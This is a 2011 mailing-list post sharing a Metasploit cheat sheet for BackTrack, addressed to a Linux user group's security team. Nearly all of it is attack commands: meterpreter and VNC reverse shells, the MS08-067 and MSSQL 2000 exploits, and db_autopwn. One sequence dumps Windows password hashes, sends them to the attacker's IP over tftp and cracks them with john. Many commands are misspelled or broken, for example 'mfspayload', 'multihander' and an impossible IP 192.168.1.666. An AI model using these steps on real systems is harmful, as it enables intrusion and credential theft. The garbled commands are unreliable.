Basic Metasploit CHEAT Sheet

Top Page
Attachments:
Message as email
+ (text/plain)
+ (text/html)
+ (text/plain)
Delete this message
Reply to this message
Author: Lisa Kachold
Date:  
To: Main PLUG discussion list, PLUG Linux Security Team
Subject: Basic Metasploit CHEAT Sheet
Okay, you guys, here's a couple of HowTo's for basic Metasploit from
Backtrack4R1:

0) Quick Windows MultiHandler Reverse Shell

startx
/etc/init.d/./wicd start
{check your wireless or wired connection is working}
mfspayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444
>/root/payload.exe

optimize /root/putty.exe (for Windows target)
msfconsole
mfs> use exploit/multihander
mfs> set PAYLOAD windows/meterpreter/reverse_tcp
mfs> show options
mfs> set RHOST (local host ip)
mfs> shell go

mfsconsole > migrate <process #>
example msfconsole > migrate 256
mfs> show explore
mfs> use name (from show explore)
mfs> set PAYLOAD
mfs> set RHOST
mfs> set LHOST


1) Nmap Mssql 2000
nmap -sT -0 10.10.10.254
nmap -sV 10.10.10.254
mfsconsole
show exploits
cut and paste with your mouse highlight
use mssql2000_resolution
set PAYLOAD win32_bind_meterpreter
show options
set RHOST (target) 10.10.10.254
exploit
help
execute -n Process
execute -f file
execute -f cmd -c
interact 1
ipconfig
see Menu---->System-->MISC--->TFTPD Server Start
On your Backtrack Linux shell:
cd /pentest/windows-binaries/tools
ls
cp PwDmp4.dll /tmp/PwDmp4.exe
cd /pentest/password/dictionaries
ls
cp wordlist.txt.gz /tmp/wordlist.txt
tftp -i 10.10.10.254 get PwDump4.dll (or exe)
tftp -i 10.10.10.254 get nc,exe
<go back to windows shell>
pwDmp4.exe
pwDmp4.exe \l \o:pwdmp4.txt
tftp 10.10.10.666 (our ip) put pwdmp4.txt
<back to linux BT environment shell>
cat pwdmp4.txt
john pwdmp4.txt
john -show pwdmp4.txt
john -w:wordlist.txt -f:NT pwdmp4.txt
<back to Windows>
nc -L -p 10.10.10.254
<back to BT linux shell>
telnet victim - login as Administrator with password

2) Quick VNC using Autopwn
mfsconsole
db_create foo
db_nmap <targetip or> 10.10.10.254
db_autopwn -h
db_autopwn -p -e
sessions -i 1
sysinfo
run vnc_oneport

3) Quick SMB (use another exploit if you like) & VNC Reverse Shell
mfsconsole
use windows/smb/ms08_067_netapi
show options
set PAYLOAD windows/vncinject/reverse_tcp
show options
set RHOST 10.10.10.254
show options
set LHOST 10.10.10.666
exploit
<spawns a shell on reverse machine>

4) Example using Nessus Plugins and db_autopwn
<shell>
apt-get install nessusd nessus
nessusd (takes about 10 minutes to start)
cd /pentest/exploits/framework3
svn update
./mfsconsole
<another shell>
./nessus
Start a scan and Generate a Report
mfs> help
mfs> db_create /root/database/foobar.db
mfs> db_import

      Cross reference from report showing exploit port open and probable
reported from Nessus
Save output of the Nessus report to /root/nessus.nbe

mfs> db_import_nessus_nbe /root/nessus.nbe
mfs> db_autopwn -p -e

Viola!

*
**DISCLAIMER: The use of Backtrack4R2 is advocated in pentest laboratories
only and for fully qualified professionals after written Corporate
approval. We do not advocate "cracking" and prefer the definition
hacker<http://hacker.>in it's original term meaning those who reverse
engineer and creatively
evaluate to learn. We do not advocate "learning to hack"; instead hacking
to learn.*

Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com
January 29, 2011, Noon until 3PM.

--

(503) 754-4452
(623) 688-3392

http://www.obnosis.com
---------------------------------------------------
PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss